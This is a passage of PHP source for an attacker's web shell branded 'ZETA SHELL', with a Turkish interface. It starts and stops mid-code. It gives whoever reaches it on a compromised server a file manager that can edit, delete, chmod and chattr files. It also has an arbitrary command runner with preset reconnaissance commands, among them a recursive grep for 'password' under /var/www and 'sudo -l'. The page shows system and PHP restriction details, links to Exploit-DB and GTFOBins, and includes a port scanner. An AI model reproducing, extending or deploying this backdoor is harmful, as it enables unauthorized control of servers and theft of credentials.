$opened_details = 'dbcheck'; }
} // POST sonu
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>ZETA SHELL <?php echo $SHELL_VERSION; ?> [Alpha]</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<script src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12"></script>
<style>
/* --- ZETA SHELL v13.2 CSS --- */
@import url('https://fonts.googleapis.com/css2?family=Fira+Code:wght@400;700&display=swap');
:root { --bg-color: #0a0a0a; --terminal-bg: #1a1a1a; --text-color: #00ff00; --header-color: #ff003c; --link-color: #00ffff; --link-hover: #ffffff; --border-color: #333; --icon-color: #ff003c; --button-bg: #ff003c; --button-text: #000; --button-hover-bg: #ff4d6d; --table-header-bg: #2a2a2a; --code-bg: #050505; --hacker-font: 'Fira Code', monospace; --perms-color: #aaaaaa; --success-bg: rgba(0, 255, 0, 0.1); --success-border: #00ff00; --error-bg: rgba(255, 0, 60, 0.15); --error-border: #ff003c; --info-bg: rgba(0, 255, 255, 0.1); --info-border: #00ffff; --icon-edit: #66ccff; --icon-rename: #66ccff; --icon-delete: #ff4d4d; --icon-download: #99ff99; --icon-archive: #ffcc66; --icon-extract: #ffad33; --icon-lock: #f0ad4e; --icon-unlock: #f0ad4e; --icon-chattr-plus: #d9534f; --icon-chattr-minus: #5cb85c; }
body { background-color: var(--bg-color); color: var(--text-color); font-family: var(--hacker-font); margin: 0; padding: 0; font-size: 13px; line-height: 1.5; overflow-x: hidden; }
.container-fluid { padding: 8px; max-width: 100%; margin: 0 auto; }
.hacker-nav { background-color: var(--terminal-bg); border-bottom: 2px solid var(--header-color); padding: 6px 10px; margin-bottom: 8px; display: flex; justify-content: space-between; align-items: center; flex-wrap: wrap; gap: 5px; }
.navbar-brand { color: var(--text-color); font-weight: bold; font-size: 1.1em; } .navbar-brand i { margin-right: 6px; color: var(--header-color); }
.hacker-controls { display: flex; align-items: center; gap: 6px; flex-wrap: wrap; }
.hacker-controls a button, .hacker-controls form button, #musicButton { background-color: var(--button-bg); color: var(--button-text); border: none; padding: 3px 7px; cursor: pointer; font-family: var(--hacker-font); font-weight: bold; transition: all 0.2s ease; border-radius: 3px; font-size: 0.75em; }
.hacker-controls a button:hover, .hacker-controls form button:hover, #musicButton:hover { background-color: var(--button-hover-bg); transform: scale(1.05); }
#musicButton { padding: 3px 5px; font-size: 1.0em; line-height: 1; }
.logout-btn { background-color: #500 !important; color: #fff !important; } .logout-btn:hover { background-color: var(--header-color) !important; }
.breadcrumb { background: var(--terminal-bg); padding: 5px 8px; margin-bottom: 8px; border: 1px solid var(--border-color); border-radius: 3px; word-break: break-all; color: var(--text-color); font-size: 0.8em; } .breadcrumb i { margin-right: 4px; color: var(--header-color); }
.system-overview { background: var(--terminal-bg); border: 1px solid var(--border-color); border-radius: 3px; padding: 5px 8px; margin-bottom: 8px; font-size: 0.75em; display: flex; flex-wrap: wrap; gap: 8px; } .system-overview span { white-space: nowrap; } .system-overview strong { color: var(--link-color); }
.hacker-table { width: 100%; border-collapse: collapse; margin-top: 8px; background-color: var(--terminal-bg); border: 1px solid var(--border-color); box-shadow: 0 0 4px rgba(0, 255, 0, 0.1); font-size: 0.8em; table-layout: auto; }
.hacker-table th, .hacker-table td { border: 1px solid var(--border-color); padding: 4px 6px; text-align: left; vertical-align: middle; word-break: normal; }
.hacker-table th { background-color: var(--table-header-bg); color: var(--header-color); font-weight: bold; white-space: nowrap; }
.hacker-table th.col-name { min-width: 150px; }
.hacker-table th.col-type { width: 50px; text-align: center;}
.hacker-table th.col-perms { width: 60px; text-align: center;}
.hacker-table th.col-actions { width: 200px; text-align: center;}
.hacker-table td:first-child { word-break: break-all; }
.hacker-table td.cell-type { text-align: center; font-weight: bold; color: var(--perms-color); }
.hacker-table td.cell-perms { text-align: center; }
.hacker-table td.action-buttons-cell { white-space: nowrap; text-align: center; }
.hacker-table tr:nth-child(even) { background-color: rgba(0, 255, 0, 0.02); } .hacker-table tr:hover { background-color: rgba(0, 255, 255, 0.05); }
.hacker-table td a { color: var(--link-color); text-decoration: none; margin-right: 3px; display: inline-block; position: relative; } .hacker-table td a:hover { color: var(--link-hover); }
.perms { color: var(--perms-color); font-size: 0.9em; cursor: help; white-space: nowrap; }
form { margin-bottom: 8px; }
.form-section, .content-section { background-color: var(--terminal-bg); padding: 8px; margin-top: 8px; border: 1px solid var(--border-color); border-radius: 5px; } .form-section h3, .content-section h3 { font-size: 0.95em; margin-top: 0; margin-bottom: 6px; color: var(--header-color); border-bottom: 1px dashed var(--border-color); padding-bottom: 3px;} .form-section h4, .content-section h4 { font-size: 0.85em; margin-bottom: 5px; color: var(--link-color); }
input[type="file"], input[type="text"], input[type="password"], textarea, select { background-color: var(--code-bg); color: var(--text-color); border: 1px solid var(--border-color); padding: 4px; margin: 2px 0; width: calc(100% - 12px); font-family: var(--hacker-font); border-radius: 3px; font-size: 0.8em; }
input[type="file"] { padding: 6px 4px; }
input[type="text"]:focus, input[type="password"]:focus, textarea:focus, select:focus { border-color: var(--link-color); outline: none; box-shadow: 0 0 3px var(--link-color);}
textarea { min-height: 120px; resize: vertical; }
select { width: auto; padding: 4px; }
.action-btn, .config-btn, .quick-cmd-btn { background-color: var(--button-bg); color: var(--button-text); border: none; padding: 4px 8px; margin: 3px 3px 3px 0; cursor: pointer; font-family: var(--hacker-font); font-weight: bold; transition: all 0.2s ease; border-radius: 3px; font-size: 0.8em; }
.action-btn:hover, .config-btn:hover, .quick-cmd-btn:hover { background-color: var(--button-hover-bg); transform: translateY(-1px); }
.action-btn i, .config-btn i, .quick-cmd-btn i { margin-right: 3px; }
.message { padding: 6px 10px; margin: 8px 0; border-radius: 3px; font-weight: bold; border: 1px solid transparent; font-size: 0.85em; display: flex; align-items: center; } .message i { font-size: 1.0em; margin-right: 5px; }
.message.success { background-color: var(--success-bg); border-color: var(--success-border); color: var(--text-color); }
.message.error { background-color: var(--error-bg); border-color: var(--error-border); color: var(--header-color); }
.message.info { background-color: var(--info-bg); border-color: var(--info-border); color: var(--link-color); }
pre.command-output, pre.info-output { background-color: var(--code-bg); color: var(--text-color); border: 1px solid var(--border-color); padding: 6px; margin-top: 6px; border-radius: 3px; white-space: pre-wrap; word-wrap: break-word; max-height: 250px; overflow-y: auto; font-size: 0.8em; }
details.collapsible-section { background-color: var(--terminal-bg); border: 1px solid var(--border-color); padding: 0; margin-top: 12px; border-radius: 5px; overflow: hidden; }
details.collapsible-section summary { color: var(--header-color); background-color: var(--table-header-bg); font-size: 0.95em; padding: 7px 10px; cursor: pointer; font-weight: bold; list-style: none; display: block; transition: background-color 0.2s ease; }
details.collapsible-section summary::-webkit-details-marker { display: none; }
details.collapsible-section summary::before { content: '\f078'; font-family: 'Font Awesome 6 Free'; font-weight: 900; margin-right: 6px; display: inline-block; transition: transform 0.2s; font-size: 0.8em;}
details.collapsible-section[open] summary::before { transform: rotate(-180deg); }
details.collapsible-section[open] summary { background-color: var(--header-color); color: var(--button-text); }
details.collapsible-section > div { padding: 8px; }
.hacker-footer { text-align: center; margin-top: 15px; padding: 6px; color: #555; font-size: 0.75em; border-top: 1px solid var(--border-color); } .hacker-footer a { color: var(--link-color); text-decoration: none; } .hacker-footer a:hover { color: var(--link-hover); } .hacker-footer span { color: var(--header-color); font-weight: bold; }
.hacker-icon-folder { color: #ffff00; } .hacker-icon-error { color: #ff4d4d; } .hacker-icon-config { color: #cccccc; } .hacker-icon-code { color: #66ccff; } .hacker-icon-image { color: #cc99ff; } .hacker-icon-audio { color: #ff99cc; } .hacker-icon-video { color: #ffcc66; } .hacker-icon-text { color: #ffffff; } .hacker-icon-archive { color: #99ff99; } .hacker-icon-doc { color: #ffad33; } .hacker-icon-default { color: var(--text-color); opacity: 0.7; } .hacker-icon-link { color: var(--link-color); }
.action-icon-edit, .action-icon-rename { color: var(--icon-edit); } .action-icon-delete { color: var(--icon-delete); } .action-icon-download { color: var(--icon-download); } .action-icon-archive { color: var(--icon-archive); } .action-icon-extract { color: var(--icon-extract); } .action-icon-lock { color: var(--icon-lock); } .action-icon-unlock { color: var(--icon-unlock); } .action-icon-chattr-plus { color: var(--icon-chattr-plus); } .action-icon-chattr-minus { color: var(--icon-chattr-minus); }
.action-buttons-cell a:hover .action-icon-edit, .action-buttons-cell a:hover .action-icon-rename, .action-buttons-cell a:hover .action-icon-download, .action-buttons-cell a:hover .action-icon-lock, .action-buttons-cell a:hover .action-icon-unlock { color: var(--link-hover); }
.action-buttons-cell button:hover .action-icon-delete, .action-buttons-cell button:hover .action-icon-archive, .action-buttons-cell button:hover .action-icon-extract, .action-buttons-cell button:hover .action-icon-chattr-plus, .action-buttons-cell button:hover .action-icon-chattr-minus { color: var(--link-hover); }
@keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } } body { animation: fadeIn 0.6s ease-out; }
@keyframes glow { 0% { text-shadow: 0 0 3px var(--text-color), 0 0 5px var(--text-color); } 50% { text-shadow: 0 0 6px var(--text-color), 0 0 10px var(--text-color); } 100% { text-shadow: 0 0 3px var(--text-color), 0 0 5px var(--text-color); } }
.navbar-brand span#shell-title { animation: glow 2.5s infinite alternate; }
@media (max-width: 768px) { .hacker-nav { flex-direction: column; align-items: flex-start;} .hacker-controls { margin-top: 8px; width: 100%; justify-content: flex-start;} .system-overview { font-size: 0.7em; gap: 6px;} .hacker-table th, .hacker-table td { padding: 3px 4px; font-size: 0.75em;} .hacker-table th.col-type, .hacker-table td.cell-type { display: none; } .hacker-table th.col-perms, .hacker-table td.cell-perms { width: 50px; } .hacker-table th.col-actions, .hacker-table td.action-buttons-cell { width: auto; text-align: left; } .quick-cmd-buttons button { font-size: 0.7em; padding: 2px 5px;} details.collapsible-section summary { font-size: 0.9em; padding: 6px 10px;} }
.hidden-form { display: none; }
.flex-container { display: flex; flex-wrap: wrap; gap: 6px; align-items: flex-end; margin-bottom: 8px; }
.flex-item { flex-grow: 1; min-width: 70px; }
.flex-item-small { flex-grow: 0; flex-basis: 110px; min-width: 90px;}
.action-buttons-cell form, .action-buttons-cell a { display: inline-block !important; margin: 0 1px !important; vertical-align: middle; }
.action-buttons-cell button { background: none; border: none; padding: 0; cursor: pointer; font-size: 0.9em; }
.action-buttons-cell button i, .action-buttons-cell a i { font-size: 1.1em; vertical-align: middle; }
.action-buttons-cell .separator { display: inline-block; border-left: 1px solid var(--border-color); height: 1em; margin: 0 3px; vertical-align: middle; opacity: 0.5; }
/* Mobil Edit/Rename Form İyileştirmesi */
#editFormContainer h3, .form-section h3 { font-size: 1.1em; /* Başlık biraz daha büyük */}
.form-section form label { display: block; margin-bottom: 3px; font-weight: bold; font-size: 0.85em;} /* Rename etiketi */
.form-section form input[type="text"] { margin-bottom: 8px;}
</style>
</head>
<body>
<div class="container-fluid">
<nav class="hacker-nav">
<div class="navbar-brand">
<i class="fas fa-skull-crossbones"></i>
<span id="shell-title"></span>
</div>
<div class="hacker-controls">
<a href="?p=<?php echo encodePath('/'); ?>"><button type="button" title="Kök Dizine Git"><i class="fas fa-broadcast-tower"></i></button></a>
<a href="?p=<?php echo urlencode(encodePath($doc_root)); ?>"><button type="button" title="Web Root"><i class="fas fa-sitemap"></i></button></a>
<a href="?p=<?php echo urlencode(encodePath($script_path)); ?>"><button type="button" title="Shell Dizini"><i class="fas fa-file-code"></i></button></a>
<button id="musicButton" title="Müzik Çal/Durdur">🎵</button>
<a href="?logout=1"><button type="button" class="logout-btn" title="Çıkış Yap"><i class="fas fa-sign-out-alt"></i></button></a>
</div>
</nav>
<!-- Sistem Özeti -->
<div class="system-overview">
<span><strong>User:</strong> <?php echo runCommand('whoami')['output']; ?></span>
<span><strong>UID/GID:</strong> <?php echo runCommand('id')['output']; ?></span>
<span><strong>Server IP:</strong> <?php echo getServerIP(); ?></span>
<span><strong>PHP:</strong> <?php echo PHP_VERSION; ?></span>
<span style="flex-basis: 100%; word-break: break-all;"><strong>System:</strong> <?php echo php_uname(); ?></span>
</div>
<div class="breadcrumb">
<i class="fas fa-folder"></i> Path: <?php $path_for_breadcrumb = PATH; $path_for_breadcrumb = str_replace('\', '/', $path_for_breadcrumb); if (empty($path_for_breadcrumb) || $path_for_breadcrumb === '/') { echo "<a href="?p=" . encodePath('/') . "">/</a>"; } else { $paths = explode('/', trim($path_for_breadcrumb, '/')); $current_built_path = ''; $is_windows_path = preg_match('/^[a-zA-Z]:$/', isset($paths[0]) ? $paths[0] : ''); if ($is_windows_path) { $current_built_path = $paths[0] . '/'; echo "<a href="?p=" . encodePath($current_built_path) . "">" . htmlspecialchars($paths[0]) . "</a>/"; array_shift($paths); } else { echo "<a href="?p=" . encodePath('/') . "">/</a>"; } foreach ($paths as $id => $dir_part) { if ($dir_part === '') continue; $current_built_path .= $dir_part . '/'; echo "<a href='?p=" . encodePath(rtrim($current_built_path, '/')) . "'>" . htmlspecialchars($dir_part) . "</a>/"; } } ?>
</div>
<!-- Mesaj Alanı -->
<?php if (!empty($message)): echo '<div class="message '.$message_type.'"><i class="fas '.($message_type == 'success' ? 'fa-check-circle' : ($message_type == 'error' ? 'fa-exclamation-triangle' : 'fa-info-circle')).'"></i> '.htmlspecialchars($message).'</div>'; endif; ?>
<?php
// Ana İçerik
$show_file_manager = !isset($_GET['r']) && !isset($_GET['e']);
// Edit / Rename Formları
if (isset($_GET['e']) && isset($_GET['file'])) { $file_to_edit = urldecode($_GET['file']); $file_path = PATH . "/" . $file_to_edit; echo '<div class="form-section" id="editFormContainer" style="border-color: var(--link-color);">'; if (!is_file($file_path)) { echo '<div class="message error">Hata: Dosya değil!</div>'; } elseif (!is_readable($file_path)) { echo '<div class="message error">Hata: Okunamıyor!</div>'; } elseif (!is_really_writable($file_path)) { $content = htmlspecialchars(@file_get_contents($file_path) ?: ''); echo '<h3 style="color: orange;"><i class="fas fa-eye"></i> Görüntüleniyor (Yazılamaz!): ' . htmlspecialchars($file_to_edit) . '</h3><textarea readonly style="background-color: #101010;">' . $content . '</textarea><br><a href="?p='.urlencode(encodePath(PATH)).'"><button type="button" class="action-btn" style="background-color:#6c757d;">Geri Dön</button></a>'; } else { $content = htmlspecialchars(@file_get_contents($file_path) ?: ''); echo '<form method="post" id="editForm"><h3 style="color: var(--link-color);"><i class="fas fa-file-pen"></i> Editing: ' . htmlspecialchars($file_to_edit) . '</h3><textarea name="data" id="edit_data">' . $content . '</textarea><br><input type="hidden" name="file_to_save" value="' . htmlspecialchars($file_to_edit) . '"><button type="submit" class="action-btn" name="edit" id="edit_save_button"><i class="fas fa-save"></i> Kaydet!</button> <a href="?p='.urlencode(encodePath(PATH)).'"><button type="button" class="action-btn" style="background-color:#6c757d;">İptal</button></a></form>'; } echo '</div>'; }
if (isset($_GET['r']) && isset($_GET['file'])) { $item_to_rename = urldecode($_GET['file']); echo '<div class="form-section" style="border-color: var(--link-color);"><h3><i class="fas fa-edit"></i> Rename: ' . htmlspecialchars($item_to_rename). '</h3><form method="post"><input type="hidden" name="original_name" value="' . htmlspecialchars($item_to_rename) . '"><label for="rename_new_name_input" style="display: block; margin-bottom: 3px;">Yeni Ad:</label><input type="text" id="rename_new_name_input" name="new_name" value="' . htmlspecialchars($item_to_rename) . '" required><br><button type="submit" class="action-btn" name="rename">Rename!</button> <a href="?p='.urlencode(encodePath(PATH)).'"><button type="button" class="action-btn" style="background-color:#6c757d;">İptal</button></a></form></div>'; }
// Dosya Yöneticisi
if ($show_file_manager) {
// Upload & Yeni Oluşturma & Arama Formları
echo '<div class="flex-container" style="gap: 10px;">';
echo '<div class="form-section flex-item" style="padding: 8px 12px; margin-top: 0;"><h4><i class="fas fa-upload"></i> Upload</h4><form method="post" enctype="multipart/form-data" style="margin-bottom:0;"><div class="flex-container" style="margin-bottom:0;"><div class="flex-item"><input type="file" name="fileToUpload" id="fileToUpload" required style="padding: 4px 6px; font-size:0.8em;"></div><div style="flex-grow: 0;"><button type="submit" class="action-btn" name="upload" style="padding: 4px 8px; font-size:0.8em;"><i class="fas fa-rocket"></i> Yükle</button></div></div></form></div>';
echo '<div class="form-section flex-item" style="padding: 8px 12px; margin-top: 0;"><h4><i class="fas fa-plus-square"></i> Yeni Oluştur</h4><form method="post" style="margin-bottom:0;"><div class="flex-container" style="margin-bottom:0;"><div class="flex-item"><input type="text" name="item_name" placeholder="Ad..." required style="padding: 4px 6px; font-size:0.8em;"></div><div style="flex-grow: 0;"><select name="item_type" style="padding: 4px; font-size:0.8em;"><option value="file">Dosya</option><option value="dir">Dizin</option></select></div><div style="flex-grow: 0;"><button type="submit" class="action-btn" name="create_item" style="padding: 4px 8px; font-size:0.8em;"><i class="fas fa-magic"></i> Yarat</button></div></div></form></div>';
echo '<div class="form-section flex-item" style="padding: 8px 12px; margin-top: 0;"><h4><i class="fas fa-search"></i> Ara</h4><form method="post" style="margin-bottom:0;"><div class="flex-container" style="margin-bottom:0;"><div class="flex-item"><input type="text" name="search_term" placeholder="Dosya/Dizin adı..." value="'.(isset($_POST['search_term']) ? htmlspecialchars($_POST['search_term']) : '').'" required style="padding: 4px 6px; font-size:0.8em;"></div><div style="flex-grow: 0;"><button type="submit" class="action-btn" name="search_files" style="padding: 4px 8px; font-size:0.8em;"><i class="fas fa-search"></i> Ara</button></div></div></form></div>';
echo '</div>';
// Arama Sonuçları
if(isset($_POST['search_files']) && !empty($action_result_output)) {
echo '<details class="collapsible-section" open><summary><i class="fas fa-poll-h"></i> Arama Sonuçları</summary><div><pre class="info-output">'.$action_result_output.'</pre></div></details>';
}
// Dosya Listeleme Tablosu
if (!is_dir(PATH)) { echo '<div class="message error"><i class="fas fa-exclamation-triangle"></i> Hata: Dizin değil!</div>'; }
elseif (!is_readable(PATH)) { echo '<div class="message error"><i class="fas fa-exclamation-triangle"></i> Hata: Dizin okunamıyor! (' . htmlspecialchars(PATH) . ')</div>'; }
elseif (!($scan = @scandir(PATH))) { echo '<div class="message error"><i class="fas fa-exclamation-triangle"></i> Hata: scandir başarısız!</div>'; }
else {
$folders = array(); $files = array(); foreach ($scan as $obj) { if ($obj == '.' || $obj == '..') continue; $full_obj_path = PATH . '/' . $obj; if (@is_dir($full_obj_path)) { array_push($folders, $obj); } else { array_push($files, $obj); } } usort($folders, 'strcoll'); usort($files, 'strcoll');
echo '<div style="overflow-x: auto;">';
echo '<table class="hacker-table"><thead><tr><th class="col-name">Adı</th><th class="col-type">Tür</th><th class="col-perms">İzinler</th><th class="col-actions">Eylemler</th></tr></thead><tbody>';
foreach ($folders as $folder) { $folder_path = PATH . "/" . $folder; $perms = @fileperms($folder_path); $perms_str = ($perms === false) ? '????' : substr(sprintf('%o', $perms), -4); $perms_readable = perms_to_string($perms); $folder_encoded_name = htmlspecialchars($folder); $folder_encoded_url_p = urlencode(encodePath($folder_path)); $folder_encoded_url_f = urlencode($folder); $path_encoded_url = urlencode(encodePath(PATH)); echo "<tr><td class='col-name'>" . fileIcon($folder) . "<a href='?p=" . $folder_encoded_url_p . "'>" . $folder_encoded_name . "</a></td><td class='cell-type'>[DIR]</td><td class='cell-perms'><a href='#' class='perms' title='" . $perms_readable . "' onclick='promptChmod("" . $folder_encoded_name . "", "" . $perms_str . ""); return false;'>" . $perms_str . "</a></td><td class='action-buttons-cell'>"; echo "<a title='Düzenle' href='#' onclick='alert("Klasör düzenlenemez!"); return false;'><i class='fas fa-file-pen action-icon-edit' style='opacity:0.3;'></i></a>"; echo "<a title='Yeniden Adlandır' href='?r=1&file=" . $folder_encoded_url_f . "&p=" . $path_encoded_url . "'><i class='fas fa-edit action-icon-rename'></i></a>"; echo "<form method='post' onsubmit='return confirm("Sil: " . $folder_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $folder_encoded_name . "'><button type='submit' name='delete_item' title='Sil'><i class='fas fa-trash action-icon-delete'></i></button></form>"; echo "<form method='post' onsubmit='return confirm("ZIP Arşivle: " . $folder_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $folder_encoded_name . "'><input type='hidden' name='archive_type' value='zip'><button type='submit' name='archive_item' title='ZIP'><i class='fas fa-file-archive action-icon-archive'></i></button></form>"; echo "<form method='post' onsubmit='return confirm("TAR.GZ Arşivle: " . $folder_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $folder_encoded_name . "'><input type='hidden' name='archive_type' value='tar'><button type='submit' name='archive_item' title='TAR.GZ'><i class='fas fa-file-zipper action-icon-archive'></i></button></form>"; echo "<span class='separator'>|</span>"; echo "<a title='Kilitle (0444)' href='#' onclick='promptChmod("" . $folder_encoded_name . "", "0444", true); return false;'><i class='fas fa-lock action-icon-lock'></i></a>"; echo "<a title='Aç (0755)' href='#' onclick='promptChmod("" . $folder_encoded_name . "", "0755", true); return false;'><i class='fas fa-unlock action-icon-unlock'></i></a>"; echo "<span class='separator'>|</span>"; echo "<form method='post' onsubmit='return confirm("chattr +i: " . $folder_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $folder_encoded_name . "'><input type='hidden' name='attr_action' value='lock'><button type='submit' name='chattr_item' title='+i'><i class='fas fa-anchor action-icon-chattr-plus'></i></button></form>"; echo "<form method='post' onsubmit='return confirm("chattr -i: " . $folder_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $folder_encoded_name . "'><input type='hidden' name='attr_action' value='unlock'><button type='submit' name='chattr_item' title='-i'><i class='fas fa-unlink action-icon-chattr-minus'></i></button></form>"; echo "</td></tr>"; }
foreach ($files as $file) { $file_path = PATH . "/" . $file; $perms = @fileperms($file_path); $perms_str = ($perms === false) ? '????' : substr(sprintf('%o', $perms), -4); $size = @filesize($file_path); $size_str = ($size === false) ? '???' : formatSizeUnits($size); $perms_readable = perms_to_string($perms); $file_encoded_name = htmlspecialchars($file); $file_encoded_url_f = urlencode($file); $path_encoded_url = urlencode(encodePath(PATH)); $file_ext = fileExtension($file); $is_archive = in_array($file_ext, array("zip", "tar", "gz", "tgz", "bz2", "tbz2", "rar")); $is_readable = is_readable($file_path); echo "<tr><td class='col-name'>" . fileIcon($file) . $file_encoded_name . " <small>(".$size_str.")</small></td><td class='cell-type'>" . ($file_ext ?: '-') . "</td><td class='cell-perms'><a href='#' class='perms' title='" . $perms_readable . "' onclick='promptChmod("" . $file_encoded_name . "", "" . $perms_str . ""); return false;'>" . $perms_str . "</a></td><td class='action-buttons-cell'>"; if ($is_readable) { echo "<a title='Düzenle/Görüntüle' href='?e=1&file=" . $file_encoded_url_f . "&p=" . $path_encoded_url . "'><i class='fas fa-file-pen action-icon-edit'></i></a>"; } else { echo "<a title='Okunamıyor!' href='#' onclick='alert("Okunamıyor!");'><i class='fas fa-file-pen action-icon-edit' style='opacity:0.3;'></i></a>"; } echo "<a title='Yeniden Adlandır' href='?r=1&file=" . $file_encoded_url_f . "&p=" . $path_encoded_url . "'><i class='fas fa-edit action-icon-rename'></i></a>"; echo "<form method='post' onsubmit='return confirm("Sil: " . $file_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $file_encoded_name . "'><button type='submit' name='delete_item' title='Sil'><i class='fas fa-trash action-icon-delete'></i></button></form>"; if ($is_readable) { echo "<a title='İndir' href='?dl=1&file=" . $file_encoded_url_f . "&p=" . $path_encoded_url . "' target='_blank'><i class='fas fa-download action-icon-download'></i></a>"; } else { echo "<a title='İndirilemez!' href='#' onclick='alert("İndirilemez!");'><i class='fas fa-download action-icon-download' style='opacity:0.3;'></i></a>"; } if ($is_archive) { echo "<form method='post' onsubmit='return confirm("Aç: " . $file_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $file_encoded_name . "'><button type='submit' name='extract_item' title='Aç'><i class='fas fa-box-open action-icon-extract'></i></button></form>"; } echo "<span class='separator'>|</span>"; echo "<a title='Kilitle (0444)' href='#' onclick='promptChmod("" . $file_encoded_name . "", "0444", true); return false;'><i class='fas fa-lock action-icon-lock'></i></a>"; echo "<a title='Aç (0644)' href='#' onclick='promptChmod("" . $file_encoded_name . "", "0644", true); return false;'><i class='fas fa-unlock action-icon-unlock'></i></a>"; echo "<span class='separator'>|</span>"; echo "<form method='post' onsubmit='return confirm("chattr +i: " . $file_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $file_encoded_name . "'><input type='hidden' name='attr_action' value='lock'><button type='submit' name='chattr_item' title='+i'><i class='fas fa-anchor action-icon-chattr-plus'></i></button></form>"; echo "<form method='post' onsubmit='return confirm("chattr -i: " . $file_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $file_encoded_name . "'><input type='hidden' name='attr_action' value='unlock'><button type='submit' name='chattr_item' title='-i'><i class='fas fa-unlink action-icon-chattr-minus'></i></button></form>"; echo "</td></tr>"; }
echo "</tbody></table>";
echo '</div>';
}
} // show_file_manager sonu
?>
<!-- Açılır/Kapanır Bölümler (DEĞİŞİKLİK YOK) -->
<details id="command" class="collapsible-section" <?php echo ($opened_details == 'command') ? 'open' : ''; ?>> <summary><i class="fas fa-terminal"></i> Komut Çalıştır</summary> <div> <div class="quick-cmd-buttons"> <button class="quick-cmd-btn" onclick="setCmd('whoami')">whoami</button> <button class="quick-cmd-btn" onclick="setCmd('id')">id</button> <button class="quick-cmd-btn" onclick="setCmd('uname -a')">uname -a</button> <button class="quick-cmd-btn" onclick="setCmd('ps aux')">ps aux</button> <button class="quick-cmd-btn" onclick="setCmd('netstat -tulnp')">netstat</button> <button class="quick-cmd-btn" onclick="setCmd('pwd')">pwd</button> <button class="quick-cmd-btn" onclick="setCmd('ls -la')">ls -la</button> <button class="quick-cmd-btn" onclick="setCmd('find / -name *.log 2>/dev/null | head')">*.log bul</button> <button class="quick-cmd-btn" onclick="setCmd('grep -R "password" /var/www/ 2>/dev/null | head')">grep "pass"</button> <button class="quick-cmd-btn" onclick="setCmd('sudo -l')">sudo -l</button> </div> <form method="post"> <div class="flex-container"> <div class="flex-item"> <input type="text" id="command_input" name="command" placeholder="Komutu gir..." value="<?php echo isset($_POST['command']) ? htmlspecialchars($_POST['command']) : ''; ?>" required> </div> <div style="flex-grow: 0;"> <button type="submit" name="run_command" class="action-btn"><i class="fas fa-bolt"></i> Çalıştır!</button> </div> </div> </form> <?php if ($opened_details == 'command'): ?><h4>Çıktı:</h4><pre class="command-output"><?php echo $action_result_output; ?></pre><?php endif; ?> </div> </details>
<details id="system" class="collapsible-section" <?php echo ($opened_details == 'system') ? 'open' : ''; ?>> <summary><i class="fas fa-cogs"></i> Sistem Bilgileri & Analiz</summary> <div> <div class="content-section" style="margin-top:0;"><h4><i class="fas fa-info-circle"></i> Temel Bilgiler</h4><pre class="info-output"><?php echo "<b>Sistem:</b> " . php_uname() . "n"; echo "<b>Server:</b> " . htmlspecialchars($_SERVER['SERVER_SOFTWARE']) . "n"; echo "<b>PHP:</b> " . PHP_VERSION . " <a href='?phpinfo=1&p=".urlencode(encodePath(PATH))."' target='_blank' title='phpinfo() göster'>[phpinfo]</a>" . "n"; echo "<b>User:</b> " . runCommand('whoami')['output'] . " (" . runCommand('id')['output'] . ")n"; $open_basedir = ini_get('open_basedir'); echo "<b>open_basedir:</b> " . ($open_basedir ? htmlspecialchars($open_basedir) : 'Yok (ÖZGÜR!)') . "n"; echo "<b>Disable Funcs:</b> " . (ini_get('disable_functions') ? htmlspecialchars(ini_get('disable_functions')) : 'Yok') . "n";?></pre><?php if(isset($_GET['phpinfo'])) { echo '<div style="max-height: 400px; overflow:auto; border: 1px solid #333; padding:10px; background: #fff; color: #000;">'; @phpinfo(); echo '</div>'; } ?></div> <div class="content-section"><h4><i class="fas fa-microchip"></i> Kaynaklar</h4><pre class="info-output"><?php echo "<b>Disk:</b>n" . runCommand('df -h')['output'] . "nn"; echo "<b>Bellek:</b>n" . runCommand('free -h')['output'] . "n";?></pre></div> <div class="form-section"><h4><i class="fas fa-search"></i> Analiz</h4><form method="post" style="display:inline-block;"><button type="submit" name="analyze_system" class="action-btn"><i class="fas fa-vial"></i> Analiz Et!</button></form><?php if ($opened_details == 'system'): ?><h5>Sonuç:</h5><pre class="info-output"><?php echo $action_result_output; ?></pre><p><a href="https://www.exploit-db.com/" target="_blank" class="action-btn">Exploit-DB</a> <a href="https://gtfobins.github.io/" target="_blank" class="action-btn">GTFOBins</a></p><?php endif; ?></div> </div> </details>
<details id="network" class="collapsible-section" <?php echo ($opened_details == 'network') ? 'open' : ''; ?>> <summary><i class="fas fa-network-wired"></i> Ağ Araçları</summary> <div> <div class="form-section" style="margin-top:0;"><h4><i class="fas fa-route"></i> Ping / Traceroute</h4><form method="post"><div class="flex-container"><div class="flex-item"><input type="text" name="network_target" placeholder="Hedef IP/Domain..." required></div><div style="flex-grow: 0;"><select name="network_tool"><option value="ping">Ping</option><option value="traceroute">Traceroute</option></select></div><div style="flex-grow: 0;"><button type="submit" name="run_network_tool" class="action-btn"><i class="fas fa-paper-plane"></i> Gönder</button></div></div></form></div> <div class="form-section"><h4><i class="fas fa-door-open"></i> Port Tara (fsockopen)</h4><form method="post"><div class="flex-container"><div class="flex-item"><input type="text" name="network_target" placeholder="Hedef IP/Domain..." required></div><div class="flex-item-small"><input type="text" name="network_ports" placeholder="Portlar (örn: 80,443)"></div><div style="flex-grow: 0;"><button type="submit" name="run_network_tool" value="portscan_fsockopen" class="action-btn"><i class="fas fa-binoculars"></i> Tara</button></div></div><small>Boş bırakırsan yaygın portları dener.</small></form></div> <div class="form-section"><h4><i class="fas fa-cloud-download-alt"></i> cURL 